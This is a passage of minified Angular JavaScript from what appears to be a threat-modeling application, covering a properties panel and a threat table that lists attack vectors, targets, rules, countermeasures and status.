n=e.target.value.toLowerCase();this.myDatas=this.myDatas.filter(r=>i.includes(r)||r.Name.toLowerCase().includes(n))}},250)}GetFlowTypes(){return DG.GetKeys()}GetFlowTypeName(e){return DG.ToString(e)}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}GetLineTypes(){return TG.GetKeys()}GetLineTypeName(e){return TG.ToString(e)}GetArrowPositions(){return EG.GetKeys()}GetArrowPositionName(e){return EG.ToString(e)}GetDeviceInterfaceNames(){return class _we{static GetKeys(){return[So.None,So.HumanInterface,So.MachineInterface,So.Environment]}}.GetKeys()}GetMnemonics(){return this.dataService.Config.GetStencilThreatMnemonics()}GetLetterTooltip(e){var i;let n=e.Name;return(null===(i=e.Description)||void 0===i?void 0:i.length)>0&&(n+="\n\n"+e.Description),n}AddMnemonicThreat(e){this.threatEngine.AddMnemonicThreat(this.selectedElement,e)}AssignNumberToAsset(){const e=this.selectedObject;e.IsNewAsset=!0,e.Number=0==this.dataService.Project.GetNewAssets().length?"1":(Math.max(...this.dataService.Project.GetNewAssets().map(i=>Number(i.Number)).filter(i=>!isNaN(i)))+1).toString()}ChangeDataFlowDirection(){this.selectedElement.ChangeDirection()}OpenNotes(){this.dialog.OpenNotesDialog(this.selectedObject.Notes,!0,!1,!0,!0)}OpenQuestionnaire(){this.openQuestionnaire.emit(this.selectedObject)}QuestionnaireBadge(){if(this.selectedObject instanceof rf&&this.selectedObject.IsActive){const e=Object.values(this.selectedObject.ThreatQuestions).filter(i=>null==i).length;if(e>0)return e.toString()}return""}NotesBadge(){if(this.selectedObject instanceof rf){const e=this.selectedObject.Notes.length;if(e>0)return e.toString()}return""}CreateUseCaseDiagram(){let e=this.dataService.Project.CreateDiagram(xn.DataFlow);e.Name=this.selectedObject.Name,this.selectedObject.DataFlowDiagramID=e.ID,setTimeout(()=>{this.router.navigate([],{relativeTo:this.activatedRoute,queryParams:{viewID:e.ID},replaceUrl:!0})},500)}GetIconColor(e=!1){return e?this.theme.Primary:this.theme.IsDarkMode?"#FFF":"#000"}IsDFDElement(){return this.selectedObject instanceof lc}IsComponent(){return this.selectedObject instanceof rf}IsUseCase(){return this.selectedObject instanceof b5}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(RT),Ee(_r),Ee(Oo),Ee(Tl))},t.\u0275cmp=Wt({type:t,selectors:[["app-properties"]],hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{dataObject:"dataObject",selectedObject:"selectedObject"},outputs:{selectedObjectChanged:"selectedObjectChanged",openQuestionnaire:"openQuestionnaire"},decls:4,vars:1,consts:[[2,"width","100%","height","100%","font-size","small"],["id","proptable","style","padding: 10px; width: 100%;",4,"ngIf"],["id","proptable",2,"padding","10px","width","100%"],["span","1",2,"width","calc(100% - 200px)"],["span","1",2,"width","200px"],[4,"ngFor","ngForOf"],[4,"ngIf"],["matTooltipShowDelay","1000",3,"matTooltip"],["style","width: 100%;",3,"disable","ngModel","change",4,"ngIf"],["mat-raised-button","",3,"click",4,"ngIf"],["color","primary",3,"checked","disabled","change",4,"ngIf"],["class","buttonAsText primary-color",3,"click",4,"ngIf"],["style","width: 100%;",3,"ngModel","change",4,"ngIf"],["color","primary",3,"checked","change",4,"ngIf"],["type","text","style","width: 100%;",3,"spellcheck","value","disabled","input",4,"ngIf"],["class","matSelect","style","width: 100%;","multiple","",3,"value","selectionChange",4,"ngIf"],["mat-raised-button","","matBadgeColor","primary","matBadgeSize","small","matBadgePosition","below",3,"matBadge","matBadgeHidden","click",4,"ngIf"],["type","text","style","width: 100%; font-size: inherit;",3,"spellcheck","value","disabled","input",4,"ngIf"],["type","text","style","width: 100%;",3,"spellcheck","invalid","value","disabled","input",4,"ngIf"],[2,"width","100%",3,"ngModel","change"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],["mat-raised-button","",3,"click"],["color","primary",3,"checked","disabled","change"],["mat-icon-button","","cdkOverlayOrigin","","matTooltipShowDelay","1000",1,"iconBtn",2,"margin-right","5px",3,"matTooltip","click"],["trigger","cdkOverlayOrigin"],["xmlns","http://www.w3.org/2000/svg","width","25","height","25","version","1.1"],["cx","3","cy","3","r","2",4,"ngIf"],["cx","3","cy","20","r","2",4,"ngIf"],["cx","20","cy","3","r","2",4,"ngIf"],["cx","20","cy","20","r","2",4,"ngIf"],["cx","11.5","cy","3","r","2"],["cx","11.5","cy","20","r","2"],["cx","3","cy","11.5","r","2"],["cx","20","cy","11.5","r","2"],["cdkConnectedOverlay","",3,"cdkConnectedOverlayOrigin","cdkConnectedOverlayOpen"],["cx","3","cy","3","r","2"],["cx","3","cy","20","r","2"],["cx","20","cy","3","r","2"],["cx","20","cy","20","r","2"],[1,"flowAnchorOverlay",2,"padding","3px"],[1,"flowAnchorOverlay"],["mat-icon-button","","class","anchorBtn",3,"click",4,"ngIf"],[2,"min-width","40px","width","100%","text-align","center"],["mat-icon-button","",1,"anchorBtn",3,"click"],["xmlns","http://www.w3.org/2000/svg","width","18","height","18","version","1.1"],["fill","#d9d9d9","cx","8","cy","8","r","8"],["x1","2.5","y1","2.5","x2","13.5","y2","13.5",2,"stroke-width","2"],["x1","2.5","y1","13.5","x2","13.5","y2","2.5",2,"stroke-width","2"],[2,"min-width","40px","width","100%","text-align","center","font-size","small"],[1,"flowAnchorOverlay",2,"margin-top","3px"],["mat-icon-button","","matTooltipShowDelay","1000",1,"anchorBtn",2,"position","absolute","top","-8px","right","-8px","width","20px","height","20px",3,"matTooltip","click"],["xmlns","http://www.w3.org/2000/svg","width","20","height","20","version","1.1"],["cx","9","cy","9","r","8",2,"stroke-width","2"],["x1","3.5","y1","3.5","x2","14.5","y2","14.5",2,"stroke-width","2"],["x1","3.5","y1","14.5","x2","14.5","y2","3.5",2,"stroke-width","2"],[1,"buttonAsText","primary-color",3,"click"],[3,"label",4,"ngFor","ngForOf"],[3,"label"],["no-space","","multiple","",1,"matSelect",2,"width","calc(100% - 22px)",3,"disabled","value","selectionChange"],["matInput","",1,"searchBox",3,"placeholder","keyup"],["class","matOption","color","primary",3,"value",4,"ngFor","ngForOf"],["mat-icon-button","","matTooltipShowDelay","1000",2,"height","20px","width","20px","line-height","20px",3,"matTooltip","click"],["color","primary",1,"matOption",3,"value"],["color","primary",3,"checked","change"],["type","text",2,"width","100%",3,"spellcheck","value","disabled","input"],["multiple","",1,"matSelect",2,"width","100%",3,"value","selectionChange"],["mat-raised-button","","matBadgeColor","primary","matBadgeSize","small","matBadgePosition","below",3,"matBadge","matBadgeHidden","click"],["type","text",2,"width","100%","font-size","inherit",3,"spellcheck","value","disabled","input"],["style","margin-right: 5px;",4,"ngFor","ngForOf"],[2,"margin-right","5px"],["matTooltipShowDelay","1000",1,"buttonAsText",2,"font-size","small",3,"matTooltip","click"],["colspan","2"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),ne(2,Zdt,15,3,"table",1),s(3,"\n"),u()),2&e&&(C(2),V("ngIf",i.selectedObject))},dependencies:[Zi,Ri,pm,_m,Ed,Ta,Ea,oa,Hh,br,da,Nr,yr,Xa,Pa,i8,t8,KT,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%], .matOption[_ngcontent-%COMP%]     .mat-pseudo-checkbox-checked{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .flowAnchorOverlay-light[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .flowAnchorOverlay-dark[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}button[_ngcontent-%COMP%]{font-size:11px;line-height:20px}.buttonAsText[_ngcontent-%COMP%]{background:none;border:none;margin:0;padding:0;cursor:pointer;font-size:small}.matSelect[_ngcontent-%COMP%]{background-color:#fff!important;border-radius:2px;height:17px;border:gray 1px solid}.matSelect[_ngcontent-%COMP%]     .mat-select-arrow{color:#000!important}.matSelect[_ngcontent-%COMP%]     .mat-select-value{color:#000!important;font-size:smaller!important}.searchBox[_ngcontent-%COMP%]{background-color:#fff!important;height:17px;color:#000;border:0;outline:0;padding:0 8px;width:calc(100% - 16px)}.searchBox[_ngcontent-%COMP%]::placeholder{color:gray}.matOption[_ngcontent-%COMP%]{background-color:#fff!important;color:#000!important;height:20px!important;padding:0 8px!important}.matOption[_ngcontent-%COMP%]     .mat-option.mat-active{color:#000!important;background-color:#fff!important}.matOption[_ngcontent-%COMP%]     .mat-pseudo-checkbox{color:gray!important}.invalid[_ngcontent-%COMP%]{border:1px solid red}.disable[_ngcontent-%COMP%]{pointer-events:none}  .mat-tooltip{white-space:pre-line!important}.flowAnchorOverlay[_ngcontent-%COMP%]{border:solid 1px #ccc;border-radius:5px;margin:0}.flowAnchorOverlay-dark[_ngcontent-%COMP%], .flowAnchorOverlay-light[_ngcontent-%COMP%]{border-color:#fff}.iconBtn[_ngcontent-%COMP%]{height:24px;width:25px;min-width:25px;padding:0;line-height:20px}.anchorBtn[_ngcontent-%COMP%]{height:18px;width:18px;min-width:18px;padding:0;line-height:18px}"]}),t})();const emt=["searchCMBox"];function tmt(t,a){1&t&&it(0,"mat-progress-spinner",32),2&t&&V("diameter",20)}function imt(t,a){if(1&t&&(m(0,"span",33),s(1),u()),2&t){const e=B();C(1),ke(e.GetApplicableCount())}}function amt(t,a){1&t&&(m(0,"th",34),s(1," "),u())}function nmt(t,a){if(1&t&&(m(0,"td",35),s(1," "),m(2,"mat-icon"),s(3),u(),s(4," "),u()),2&t){const e=a.$implicit,i=B();C(3),ke(i.GetStateIcon(e))}}function omt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Number")," "))}function rmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Number," ")}}function smt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Name")," "))}function cmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.GetProperty("Name")," ")}}function lmt(t,a){1&t&&(m(0,"th",36),s(1," "),u())}function dmt(t,a){if(1&t&&(m(0,"td",35),s(1," "),m(2,"mat-icon",37),oe(3,"translate"),s(4),u(),s(5," "),u()),2&t){const e=a.$implicit,i=B();C(2),at("matTooltip",re(3,4,i.GetCreationTypeIconTooltip(e))),V("matBadge","!")("matBadgeHidden",e.RuleStillApplies),C(2),ke(i.GetCreationTypeIcon(e))}}function mmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.AttackVector")," "))}function umt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",null==e.AttackVector?null:e.AttackVector.GetProperty("Name")," ")}}function hmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.ThreatCategories")," "))}function fmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetThreatCategories(e)," ")}}function pmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Target")," "))}function _mt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;Ct("selected-cell",B().IsElementSelected(e)),C(1),ct(" ",null==e.Target?null:e.Target.GetProperty("Name")," ")}}function gmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Rule")," "))}function Cmt(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ThreatRule.GetProperty("Name"))}}function ymt(t,a){if(1&t&&(m(0,"td",35),s(1," "),ne(2,Cmt,2,1,"ng-container",38),u()),2&t){const e=a.$implicit;C(2),V("ngIf",e.ThreatRule)}}function bmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Elements")," "))}function Mmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=B();Ct("selected-cell",i.IsElementSelected(e)),C(1),ct(" ",i.GetTargets(e)," ")}}function vmt(t,a){1&t&&(m(0,"th",39),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Countermeasures")," "))}function Amt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetCountermeasures(e)," ")}}function Tmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function Emt(t,a){if(1&t&&(m(0,"option",42),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetThreatStateName(e)))}}function Dmt(t,a){if(1&t){const e=Ye();m(0,"td",35),s(1,"\n          "),m(2,"select",40),he("ngModelChange",function(n){return Me(be(e).$implicit.ThreatState=n)}),s(3,"\n            "),ne(4,Emt,3,4,"option",41),s(5,"\n          "),u(),s(6,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.ThreatState),C(2),V("ngForOf",i.GetThreatStates())}}function xmt(t,a){1&t&&(m(0,"th",39),s(1," "),u())}function wmt(t,a){if(1&t){const e=Ye();m(0,"td",35),s(1," "),m(2,"mat-icon",43),he("click",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"general.More")))}function Imt(t,a){1&t&&it(0,"tr",44)}function Rmt(t,a){if(1&t){const e=Ye();m(0,"tr",45),he("click",function(){const r=be(e).$implicit;return Me(B().SelectThreat(r))})("dblclick",function(n){const c=be(e).$implicit;return Me(B().OnMappingDblClick(c,n))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n      "),u()}if(2&t){const e=a.$implicit,i=B();Ct("selected-item",i.IsThreatSelected(e))("removed-item",i.IsThreatRemoved(e)||i.IsThreatNotApplying(e)),V("id",e.ID)}}function Smt(t,a){if(1&t){const e=Ye();m(0,"tr",46),s(1,"\n        "),m(2,"td",47),he("contextmenu",function(n){return be(e),Me(B().OpenContextMenu(n,null))}),s(3),oe(4,"translate"),u(),s(5,"\n      "),u()}2&t&&(C(3),ke(re(4,1,"pages.modeling.threattable.noThreats")))}function kmt(t,a){1&t&&(m(0,"th",34),s(1," "),u())}function Pmt(t,a){if(1&t&&(m(0,"td",35),s(1," "),m(2,"mat-icon"),s(3),u(),s(4," "),u()),2&t){const e=a.$implicit,i=B();C(3),ke(i.GetStateIcon(e))}}function Omt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Number")," "))}function Nmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Number," ")}}function Lmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Name")," "))}function zmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.GetProperty("Name")," ")}}function Wmt(t,a){1&t&&(m(0,"th",36),s(1," "),u())}function Fmt(t,a){if(1&t&&(m(0,"td",35),s(1," "),m(2,"mat-icon",37),oe(3,"translate"),s(4),u(),s(5," "),u()),2&t){const e=a.$implicit,i=B();C(2),at("matTooltip",re(3,4,i.GetCreationTypeIconTooltip(e))),V("matBadge","!")("matBadgeHidden",e.RuleStillApplies),C(2),ke(i.GetCreationTypeIcon(e))}}function Vmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.AttackVector")," "))}function Bmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",null==e.AttackVector?null:e.AttackVector.GetProperty("Name")," ")}}function Hmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.ThreatCategories")," "))}function Umt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetThreatCategories(e)," ")}}function qmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Target")," "))}function Gmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit;Ct("selected-cell",B().IsElementSelected(e)),C(1),ct(" ",null==e.Target?null:e.Target.GetProperty("Name")," ")}}function jmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Rule")," "))}function Qmt(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ThreatRule.GetProperty("Name"))}}function $mt(t,a){if(1&t&&(m(0,"td",35),s(1," "),ne(2,Qmt,2,1,"ng-container",38),u()),2&t){const e=a.$implicit;C(2),V("ngIf",e.ThreatRule)}}function Kmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Elements")," "))}function Xmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=B();Ct("selected-cell",i.IsElementSelected(e)),C(1),ct(" ",i.GetTargets(e)," ")}}function Ymt(t,a){1&t&&(m(0,"th",39),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Countermeasures")," "))}function Jmt(t,a){if(1&t&&(m(0,"td",35),s(1),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",i.GetCountermeasures(e)," ")}}function Zmt(t,a){1&t&&(m(0,"th",36),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function eut(t,a){if(1&t&&(m(0,"option",42),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetThreatStateName(e)))}}function tut(t,a){if(1&t){const e=Ye();m(0,"td",35),s(1,"\n          "),m(2,"select",40),he("ngModelChange",function(n){return Me(be(e).$implicit.ThreatState=n)}),s(3,"\n            "),ne(4,eut,3,4,"option",41),s(5,"\n          "),u(),s(6,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();C(2),V("ngModel",e.ThreatState),C(2),V("ngForOf",i.GetThreatStates())}}function iut(t,a){1&t&&(m(0,"th",39),s(1," "),u())}function aut(t,a){if(1&t){const e=Ye();m(0,"td",35),s(1," "),m(2,"mat-icon",43),he("click",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"general.More")))}function nut(t,a){if(1&t){const e=Ye();m(0,"tr",48),he("click",function(){const r=be(e).$implicit;return Me(B().SelectThreat(r))})("dblclick",function(n){const c=be(e).$implicit;return Me(B().OnMappingDblClick(c,n))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B().OpenContextMenu(n,c))}),s(1,"\n      "),u()}if(2&t){const e=a.$implicit,i=B();Ct("selected-item",i.IsThreatSelected(e))("removed-item",i.IsThreatRemoved(e)||i.IsThreatNotApplying(e))}}function out(t,a){if(1&t&&(m(0,"span",62),s(1),u()),2&t){const e=B().item;C(1),ke(e.GetProperty("Name"))}}function rut(t,a){1&t&&(m(0,"span",62),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"pages.modeling.threattable.noEntrySelected")))}const sut=function(t){return{item:t}};function cut(t,a){if(1&t&&(m(0,"button",63),s(1),u()),2&t){const e=a.$implicit;B(),V("matMenuTriggerFor",Ti(48))("matMenuTriggerData",fr(3,sut,e.countermeasures)),C(1),ke(e.name)}}function lut(t,a){if(1&t){const e=Ye();m(0,"button",64),he("click",function(){const r=be(e).$implicit,c=B(2).item;return Me(B().AddExistingCountermeasure(c,r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function dut(t,a){if(1&t&&(s(0,"\n          "),ne(1,lut,2,2,"button",61),s(2,"\n        ")),2&t){const e=a.item;C(1),V("ngForOf",e)}}function mut(t,a){if(1&t){const e=Ye();m(0,"button",64),he("click",function(){const r=be(e).$implicit,c=B().item;return Me(B().AddExistingCountermeasure(c,r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function uut(t,a){if(1&t){const e=Ye();s(0,"\n      "),ne(1,out,2,1,"span",49),s(2," \n      "),ne(3,rut,3,3,"span",49),s(4,"\n      "),m(5,"button",50),he("click",function(){const r=be(e).item;return Me(B().OnMappingDblClick(r,null))}),s(6,"\n        "),m(7,"mat-icon"),s(8,"edit"),u(),s(9,"\n        "),m(10,"span"),s(11),oe(12,"translate"),u(),s(13,"\n      "),u(),s(14," \n      "),m(15,"button",51),s(16,"\n        "),m(17,"mat-icon"),s(18,"security"),u(),s(19,"\n        "),m(20,"span"),s(21),oe(22,"translate"),u(),s(23,"\n      "),u(),s(24,"\n      "),m(25,"mat-menu",null,52),s(27,"\n        "),m(28,"button",53),he("click",function(){const r=be(e).item;return Me(B().AddCountermeasure(r))}),s(29),oe(30,"translate"),u(),s(31,"\n        "),m(32,"button",54),s(33),oe(34,"translate"),u(),s(35,"\n      "),u(),s(36,"\n      "),m(37,"mat-menu",null,55),s(39,"\n        "),m(40,"input",56,57),he("ngModelChange",function(n){return be(e),Me(B().searchCMString=n)})("click",function(){return be(e),Me(B().OnSearchCMBoxClick())}),oe(42,"translate"),u(),s(43,"\n        "),ne(44,cut,2,5,"button",58),s(45,"\n      "),u(),s(46,"\n      "),m(47,"mat-menu",null,59),s(49,"\n        "),ne(50,dut,3,1,"ng-template",31),s(51," \n      "),u(),s(52,"\n      "),m(53,"mat-menu",null,60),s(55,"\n        "),ne(56,mut,2,2,"button",61),s(57,"\n      "),u(),s(58,"\n\n      "),m(59,"button",50),he("click",function(){const r=be(e).item;return Me(B().OnViewCountermeasures(r))}),s(60,"\n        "),m(61,"mat-icon"),s(62,"preview"),u(),s(63,"\n        "),m(64,"span"),s(65),oe(66,"translate"),u(),s(67,"\n      "),u(),s(68," \n      "),m(69,"button",50),he("click",function(){const r=be(e).item;return Me(B().OnDeleteMapping(r))}),s(70,"\n        "),m(71,"mat-icon"),s(72,"delete"),u(),s(73,"\n        "),m(74,"span"),s(75),oe(76,"translate"),u(),s(77,"\n      "),u(),s(78,"\n      "),m(79,"button",53),he("click",function(){return be(e),Me(B().ResetNumbers())}),s(80,"\n        "),m(81,"mat-icon"),s(82,"delete"),u(),s(83,"\n        "),m(84,"span"),s(85),oe(86,"translate"),u(),s(87,"\n      "),u(),s(88,"\n    ")}if(2&t){const e=a.item,i=Ti(26),n=Ti(38),r=Ti(54),c=B();C(1),V("ngIf",e),C(2),V("ngIf",!e),C(2),V("disabled",!e),C(6),ke(re(12,20,"pages.modeling.threattable.editEntry")),C(4),V("disabled",!e)("matMenuTriggerFor",i),C(6),ke(re(22,22,"pages.modeling.diagram.addCountermeasure")),C(8),ke(re(30,24,"general.New")),C(3),V("matMenuTriggerFor",n),C(1),ke(re(34,26,"general.Existing")),C(7),at("placeholder",re(42,28,"general.Search")),V("ngModel",c.searchCMString)("matMenuTriggerFor",r),C(4),V("ngForOf",c.GetCountermeasureGroups(e)),C(12),V("ngForOf",c.GetFilteredCountermeasures(e)),C(3),V("disabled",!e),C(6),ke(re(66,30,"pages.modeling.threattable.viewCountermeasures")),C(4),V("disabled",!e),C(6),ke(re(76,32,"pages.modeling.threattable.deleteEntry")),C(10),ke(re(86,34,"pages.modeling.threattable.resetNumbers"))}}let hut=(()=>{class t{constructor(e,i,n,r,c){this.theme=e,this.dataService=i,this.threatEngine=n,this.dialog=r,this.translate=c,this.changesCounter=0,this.isCalculatingThreats=!1,this._attackScenarios=[],this.countermeasureCounts={},this.displayedColumns=[],this.autoRefreshThreats=!0,this.menuTopLeftPosition={x:"0",y:"0"},this.selectedObjectChanged=new Tt,this.threatCountChanged=new Tt,this.searchCMString="";let d=()=>{this.autoRefreshThreats&&(0==this.changesCounter?setTimeout(()=>{this.isCalculatingThreats=!0,this.changesCounter++},10):this.changesCounter++,setTimeout(()=>{this.changesCounter--,0==this.changesCounter&&this.RefreshThreats()},3e3))};this.dataService.Project&&setTimeout(()=>{var T,k,q,Y;null===(T=this.dataService.Project)||void 0===T||T.DFDElementsChanged.subscribe(te=>d()),null===(k=this.dataService.Project)||void 0===k||k.MyComponentsChanged.subscribe(te=>d()),null===(q=this.dataService.Project)||void 0===q||q.AttackScenariosChanged.subscribe(te=>{te.Type==Ja.Added&&(this.dataService.Project.GetAttackScenario(te.ID).IsGenerated||d()),this.countermeasureCounts={}}),null===(Y=this.dataService.Project)||void 0===Y||Y.CountermeasuresChanged.subscribe(te=>this.countermeasureCounts={})},1e3)}get refreshingThreats(){return this.changesCounter>0||this.isCalculatingThreats}get AttackScenarios(){return this._attackScenarios}set AttackScenarios(e){this._filteredObject&&(e=e.filter(d=>d.Targets.includes(this._filteredObject)||d.Target==this._filteredObject)),this._attackScenarios=e;const i=(d,T)=>"name"==T?d.Name:"number"==T?Number(d.Number):"state"==T?d.MappingState:"type"==T?d.IsGenerated?1:0:"vector"==T?d.AttackVector.Name:"status"==T?d.ThreatState:"categories"==T?this.GetThreatCategories(d):"target"==T?d.Target.Name:"rule"==T?d.ThreatRule.Name:"elements"==T?this.GetTargets(d):void console.error("Missing sorting header"),n=(d,T)=>{let k=T.trim().toLowerCase(),q=d.Name.toLowerCase().indexOf(k);return-1==q&&d.AttackVector&&(q=d.AttackVector.Name.toLowerCase().indexOf(k)),-1==q&&this.GetThreatCategories(d)&&(q=this.GetThreatCategories(d).toLowerCase().indexOf(k)),-1==q&&this.GetTargets(d)&&(q=this.GetTargets(d).toLowerCase().indexOf(k)),-1==q&&d.ThreatRule&&(q=d.ThreatRule.Name.toLowerCase().indexOf(k)),-1!=q},r=e.filter(d=>![_o.NotApplicable,_o.Duplicate].includes(d.ThreatState));r.sort((d,T)=>Number(d.Number)<Number(T.Number)?-1:1),this.dataSourceActive=new zd(r),this.dataSourceActive.sort=this.sort,this.dataSourceActive.sortingDataAccessor=i,this.dataSourceActive.filterPredicate=n;const 